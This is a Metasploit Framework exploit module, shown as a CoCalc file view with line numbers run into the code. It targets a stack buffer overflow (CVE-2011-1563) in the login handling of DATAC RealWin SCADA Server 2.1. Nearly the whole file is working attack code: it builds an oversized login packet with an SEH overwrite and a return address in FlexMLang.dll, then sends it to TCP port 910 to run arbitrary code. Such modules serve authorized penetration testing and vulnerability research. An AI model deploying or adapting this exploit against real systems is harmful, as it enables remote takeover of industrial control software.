CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/scada/realwin_on_fcs_login.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Tcp9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(update_info(info,13'Name' => 'RealWin SCADA Server DATAC Login Buffer Overflow',14'Description' => %q{15This module exploits a stack buffer overflow in DATAC Control16International RealWin SCADA Server 2.1 (Build 6.0.10.10) or17earlier. By sending a specially crafted On_FC_CONNECT_FCS_LOGIN18packet containing a long username, an attacker may be able to19execute arbitrary code.20},21'Author' =>22[23'Luigi Auriemma', #discovery24'MC',25'B|H <bh[AT]bufferattack.com>'26],27'License' => MSF_LICENSE,28'References' =>29[30[ 'CVE', '2011-1563'],31[ 'OSVDB', '72824'],32[ 'URL', 'http://aluigi.altervista.org/adv/realwin_2-adv.txt' ],33[ 'URL', 'http://www.dataconline.com/software/realwin.php' ],34[ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-110-01']35],36'Privileged' => true,37'DefaultOptions' =>38{39'EXITFUNC' => 'thread',40},41'Payload' =>42{43'Space' => 450,44'BadChars' => "\x00\x20\x0a\x0d",45'StackAdjustment' => -3500,46},47'Platform' => 'win',48'Targets' =>49[50[ 'Universal',51{52'Offset' => 392, # Offset to SEH53'Ret' => 0x40012540, # pop/pop/ret @FlexMLang.dll54}55],56],57'DefaultTarget' => 0,58'DisclosureDate' => '2011-03-21'))5960register_options([Opt::RPORT(910)])61end6263def exploit64data = [0x67542310].pack('V')65data << [0x00000824].pack('V')66data << [0x00110011].pack('V')67data << "\x01\x00"68data << rand_text_alpha_upper(target['Offset'])69data << generate_seh_payload(target.ret)70data << rand_text_alpha_upper(17706 - payload.encoded.length)71data << [0x451c3500].pack('V')72data << [0x00000154].pack('V')73data << [0x00020040].pack('V')7475connect76print_status("Trying target #{target.name}...")77sock.put(data)78select(nil,nil,nil,0.5)79handler80disconnect81end82end838485